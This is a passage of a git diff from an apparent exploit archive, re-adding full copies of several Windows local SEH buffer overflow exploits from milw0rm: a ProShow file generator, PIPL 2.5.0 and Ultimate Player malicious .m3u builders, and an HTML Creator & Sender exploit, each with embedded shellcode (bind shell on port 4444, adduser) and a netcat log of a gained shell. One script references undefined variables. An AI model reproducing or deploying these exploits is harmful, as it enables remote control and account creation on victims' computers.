+"cell[0].images[0].keyframes[1].transparency=0\n".
+"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[0].background=1\n".
+"cell[0].bgDefault=1\n".
+"cell[0].bgSizeMode=1\n".
+"cell[0].bgColorizeColor=8421504\n".
+"cell[0].sound.useDefault=1\n".
+"cell[0].sound.volume=100\n".
+"cell[0].sound.fadeIn=100\n".
+"cell[0].sound.fadeOut=100\n".
+"cell[0].sound.async=1\n".
+"cell[0].sound.musicUseDefault=1\n".
+"cell[0].sound.musicVolume=50\n".
+"cell[0].sound.musicFadeIn=100\n".
+"cell[0].sound.musicFadeOut=100\n".
+"cell[0].musicVolumeOffset=50\n".
+"cell[0].time=3000\n".
+"cell[0].transId=2\n".
+"cell[0].transTime=3000\n".
+"cell[0].includeGlobalCaptions=1\n".
+"cell[1].imageEnable=1\n".
+"cell[1].nrOfImages=1\n".
+"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
+"cell[1].images[0].imageEnable=1\n".
+"cell[1].images[0].name=Abstract_01\n".
+"cell[1].images[0].replaceableTemplate=1\n".
+"cell[1].images[0].sizeMode=1\n".
+"cell[1].images[0].colorizeColor=8421504\n".
+"cell[1].images[0].colorizeStrength=10000\n".
+"cell[1].images[0].outlineColor=16777215\n".
+"cell[1].images[0].aspectX=4\n".
+"cell[1].images[0].aspectY=3\n".
+"cell[1].images[0].videoVolume=100\n".
+"cell[1].images[0].objectId=2\n".
+"cell[1].images[0].videoSpeed=100\n".
+"cell[1].images[0].nrOfKeyframes=2\n".
+"cell[1].images[0].keyframes[0].timeSegment=1\n".
+"cell[1].images[0].keyframes[0].attributeMask=-1\n".
+"cell[1].images[0].keyframes[0].zoomX=10000\n".
+"cell[1].images[0].keyframes[0].zoomY=10000\n".
+"cell[1].images[0].keyframes[0].panAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[0].lockAR=1\n".
+"cell[1].images[0].keyframes[0].transparency=0\n".
+"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[1].images[0].keyframes[1].timestamp=10000\n".
+"cell[1].images[0].keyframes[1].timeSegment=3\n".
+"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[1].images[0].keyframes[1].attributeMask=-1\n".
+"cell[1].images[0].keyframes[1].zoomX=10000\n".
+"cell[1].images[0].keyframes[1].zoomY=10000\n".
+"cell[1].images[0].keyframes[1].panAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[1].lockAR=1\n".
+"cell[1].images[0].keyframes[1].transparency=0\n".
+"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[1].background=1\n".
+"cell[1].bgDefault=1\n".
+"cell[1].bgSizeMode=1\n".
+"cell[1].bgColorizeColor=8421504\n".
+"cell[1].sound.useDefault=1\n".
+"cell[1].sound.volume=100\n".
+"cell[1].sound.fadeIn=100\n".
+"cell[1].sound.fadeOut=100\n".
+"cell[1].sound.async=1\n".
+"cell[1].sound.musicUseDefault=1\n".
+"cell[1].sound.musicVolume=50\n".
+"cell[1].sound.musicFadeIn=100\n".
+"cell[1].sound.musicFadeOut=100\n".
+"cell[1].musicVolumeOffset=50\n".
+"cell[1].time=3000\n".
+"cell[1].transId=2\n".
+"cell[1].transTime=3000\n".
+"cell[1].includeGlobalCaptions=1\n".
+"modifierCount=0\n";
+print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
+################################################################################
+###################################################################
+open(myfile,'>> HACK4LOVE.psh');
+print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
+##################################################################
+
+# milw0rm.com [2009-08-25]
diff --git a/platforms/windows/local/9536.py b/platforms/windows/local/9536.py
index 5cb6ed58d..7bb6a72ce 100755
--- a/platforms/windows/local/9536.py
+++ b/platforms/windows/local/9536.py
@@ -1,88 +1,88 @@
-#!/usr/bin/python
-#
-#############################################################
-# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH)
-# Coded by: Steven Seeley aka mr_me 
-# email: info [At] net-ninja [d0t] net
-# Download: http://www.programmedintegration.com/files/pipl.exe
-# Tested on Wind0ws XP sp3 & Vist@
-# SEH overwrite, just for kicks
-# Surprise surpise m3u file  ;)  but no calc this time muhahaha
-# ###########################################################
-#
-# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke  :) 
-#
-# samurai@mrme:~/exploits$ nc -v 192.168.0.6 4444
-# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out
-# (UNKNOWN) [192.168.0.6] 4444 (?) open
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Documents and Settings\Owner\Desktop> 
-#
-
-print "[+] Pipl 2.5.0 local exploit"
-
-bof="\x41" * 4108
-nsh="\xEB\x06\x90\x90"
-seh="\x17\x07\x01\x10" #xaudio.dll ppr
-nops="\x90" * 20
-
-# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
-# http://metasploit.com */
-
-sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
-"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
-"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
-"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
-"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
-"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
-"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
-"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
-"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
-"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
-"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
-"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
-"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
-"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
-"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
-"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
-"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
-"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
-"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
-"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
-"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
-"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
-"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
-"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
-"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
-"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
-"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
-"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
-"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
-"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
-"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
-"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
-"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
-"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
-"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
-"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
-
-buff = bof + nsh + seh + nops + sc
-
-f1 = open('mr_mes_miX.m3u','w');
-f1.write(buff);
-f1.close();
-
-print "[+] mr_mes_miX.m3u file created successfully"
-
-# milw0rm.com [2009-08-28]
+#!/usr/bin/python
+#
+#############################################################
+# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH)
+# Coded by: Steven Seeley aka mr_me 
+# email: info [At] net-ninja [d0t] net
+# Download: http://www.programmedintegration.com/files/pipl.exe
+# Tested on Wind0ws XP sp3 & Vist@
+# SEH overwrite, just for kicks
+# Surprise surpise m3u file  ;)  but no calc this time muhahaha
+# ###########################################################
+#
+# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke  :) 
+#
+# samurai@mrme:~/exploits$ nc -v 192.168.0.6 4444
+# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out
+# (UNKNOWN) [192.168.0.6] 4444 (?) open
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Documents and Settings\Owner\Desktop> 
+#
+
+print "[+] Pipl 2.5.0 local exploit"
+
+bof="\x41" * 4108
+nsh="\xEB\x06\x90\x90"
+seh="\x17\x07\x01\x10" #xaudio.dll ppr
+nops="\x90" * 20
+
+# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
+# http://metasploit.com */
+
+sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
+"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
+"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
+"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
+"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
+"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
+"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
+"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
+"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
+"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
+"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
+"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
+"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
+"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
+"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
+"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
+"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
+"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
+"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
+"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
+"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
+"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
+"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
+"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
+"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
+"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
+"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
+"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
+"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
+"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
+"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
+"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
+"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
+"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
+"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
+"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
+
+buff = bof + nsh + seh + nops + sc
+
+f1 = open('mr_mes_miX.m3u','w');
+f1.write(buff);
+f1.close();
+
+print "[+] mr_mes_miX.m3u file created successfully"
+
+# milw0rm.com [2009-08-28]
diff --git a/platforms/windows/local/9540.py b/platforms/windows/local/9540.py
index 55438541c..29f1410d7 100755
--- a/platforms/windows/local/9540.py
+++ b/platforms/windows/local/9540.py
@@ -1,72 +1,72 @@
-#!/usr/bin/env python
-
-#############################################################################
-#
-# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH)
-# Coded By:     Dr_IDE
-# Based On:     http://www.milw0rm.com/exploits/9446
-# Testd On:	Windows XP SP2
-# Download:     http://www.html-email.net/
-# Usage:        Browse to file, enter anything for From and To, Send Email.
-#
-#############################################################################
-
-import struct
-
-# windows/adduser USER=Dr_IDE PASS=Dr_IDE
-# x86/alpha_upper succeeded with size 475 (iteration=1)
-# badchars = "\x00\x0a\x0d\x20\xff" at least, Bind Shell was
-# not working for me, there are still some unidentified bad chars.
-
-sc = (
-"\x89\xe1\xdb\xdf\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
-"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
-"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
-"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
-"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x51\x54\x43\x30\x43"
-"\x30\x43\x30\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55"
-"\x42\x58\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51"
-"\x4f\x51\x30\x45\x51\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b"
-"\x45\x51\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49"
-"\x50\x42\x54\x44\x47\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52"
-"\x4a\x4b\x4a\x54\x47\x4b\x50\x54\x46\x44\x44\x44\x44\x35\x4d"
-"\x35\x4c\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c\x4b"
-"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
-"\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4b\x39\x51\x4c\x51\x34"
-"\x44\x44\x49\x53\x51\x4f\x46\x51\x4c\x36\x43\x50\x51\x46\x42"
-"\x44\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b"
-"\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4c\x49\x4a"
-"\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58\x4a\x50\x4d\x5a"
-"\x43\x34\x51\x4f\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51"
-"\x47\x4b\x4f\x4d\x37\x42\x43\x42\x4d\x43\x54\x46\x4e\x42\x45"
-"\x43\x48\x43\x55\x47\x50\x46\x4f\x43\x53\x47\x50\x42\x4e\x43"
-"\x55\x44\x34\x47\x50\x43\x45\x42\x53\x43\x55\x44\x32\x47\x50"
-"\x50\x44\x42\x52\x51\x4f\x50\x49\x50\x44\x47\x35\x47\x50\x51"
-"\x54\x44\x32\x51\x4f\x51\x59\x51\x54\x47\x35\x51\x30\x46\x4f"
-"\x47\x31\x47\x34\x51\x54\x47\x50\x46\x46\x51\x36\x51\x30\x42"
-"\x4e\x45\x35\x43\x44\x47\x50\x42\x4c\x42\x4f\x45\x33\x45\x31"
-"\x42\x4c\x45\x37\x44\x32\x42\x4f\x43\x45\x44\x30\x51\x30\x51"
-"\x51\x43\x54\x42\x4d\x43\x59\x42\x4e\x45\x39\x44\x33\x43\x44"
-"\x43\x42\x45\x31\x43\x44\x42\x4f\x42\x52\x44\x33\x47\x50\x50"
-"\x44\x44\x32\x51\x4f\x47\x39\x47\x34\x47\x35\x47\x50\x46\x4f"
-"\x47\x31\x50\x44\x47\x34\x43\x30\x45\x5a\x41\x41")
-
-jump = ("\xEB\x06\x90\x90")
-junk = ("\x43" * (4616 - len(sc)))
-retn = ("\xFA\x89\xAB\x71") #WS2_32.DLL XPSP2
-nops = ("\x90" * 8)
-
-# Don't mess with the headers, we need to create a valid HTML file
-header1 =  ("\n\n\n\n\n\n\n")
-
-try:
-    f1 = open("Dr_IDE-Evil.html","w")
-    f1.write(header1 + payload + header2)
-    f1.close()
-    print("\nExploit file created!\n")
-except:
-    print ("Error")
-
-# milw0rm.com [2009-08-28]
+#!/usr/bin/env python
+
+#############################################################################
+#
+# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH)
+# Coded By:     Dr_IDE
+# Based On:     http://www.milw0rm.com/exploits/9446
+# Testd On:	Windows XP SP2
+# Download:     http://www.html-email.net/
+# Usage:        Browse to file, enter anything for From and To, Send Email.
+#
+#############################################################################
+
+import struct
+
+# windows/adduser USER=Dr_IDE PASS=Dr_IDE
+# x86/alpha_upper succeeded with size 475 (iteration=1)
+# badchars = "\x00\x0a\x0d\x20\xff" at least, Bind Shell was
+# not working for me, there are still some unidentified bad chars.
+
+sc = (
+"\x89\xe1\xdb\xdf\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
+"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
+"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
+"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
+"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x51\x54\x43\x30\x43"
+"\x30\x43\x30\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55"
+"\x42\x58\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51"
+"\x4f\x51\x30\x45\x51\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b"
+"\x45\x51\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49"
+"\x50\x42\x54\x44\x47\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52"
+"\x4a\x4b\x4a\x54\x47\x4b\x50\x54\x46\x44\x44\x44\x44\x35\x4d"
+"\x35\x4c\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c\x4b"
+"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
+"\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4b\x39\x51\x4c\x51\x34"
+"\x44\x44\x49\x53\x51\x4f\x46\x51\x4c\x36\x43\x50\x51\x46\x42"
+"\x44\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b"
+"\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4c\x49\x4a"
+"\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58\x4a\x50\x4d\x5a"
+"\x43\x34\x51\x4f\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51"
+"\x47\x4b\x4f\x4d\x37\x42\x43\x42\x4d\x43\x54\x46\x4e\x42\x45"
+"\x43\x48\x43\x55\x47\x50\x46\x4f\x43\x53\x47\x50\x42\x4e\x43"
+"\x55\x44\x34\x47\x50\x43\x45\x42\x53\x43\x55\x44\x32\x47\x50"
+"\x50\x44\x42\x52\x51\x4f\x50\x49\x50\x44\x47\x35\x47\x50\x51"
+"\x54\x44\x32\x51\x4f\x51\x59\x51\x54\x47\x35\x51\x30\x46\x4f"
+"\x47\x31\x47\x34\x51\x54\x47\x50\x46\x46\x51\x36\x51\x30\x42"
+"\x4e\x45\x35\x43\x44\x47\x50\x42\x4c\x42\x4f\x45\x33\x45\x31"
+"\x42\x4c\x45\x37\x44\x32\x42\x4f\x43\x45\x44\x30\x51\x30\x51"
+"\x51\x43\x54\x42\x4d\x43\x59\x42\x4e\x45\x39\x44\x33\x43\x44"
+"\x43\x42\x45\x31\x43\x44\x42\x4f\x42\x52\x44\x33\x47\x50\x50"
+"\x44\x44\x32\x51\x4f\x47\x39\x47\x34\x47\x35\x47\x50\x46\x4f"
+"\x47\x31\x50\x44\x47\x34\x43\x30\x45\x5a\x41\x41")
+
+jump = ("\xEB\x06\x90\x90")
+junk = ("\x43" * (4616 - len(sc)))
+retn = ("\xFA\x89\xAB\x71") #WS2_32.DLL XPSP2
+nops = ("\x90" * 8)
+
+# Don't mess with the headers, we need to create a valid HTML file
+header1 =  ("\n\n\n\n\n\n\n")
+
+try:
+    f1 = open("Dr_IDE-Evil.html","w")
+    f1.write(header1 + payload + header2)
+    f1.close()
+    print("\nExploit file created!\n")
+except:
+    print ("Error")
+
+# milw0rm.com [2009-08-28]
diff --git a/platforms/windows/local/9548.pl b/platforms/windows/local/9548.pl
index 2dc819004..097b8166e 100755
--- a/platforms/windows/local/9548.pl
+++ b/platforms/windows/local/9548.pl
@@ -1,39 +1,39 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH
-####################################################################
-my $bof="\x41" x 4108;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
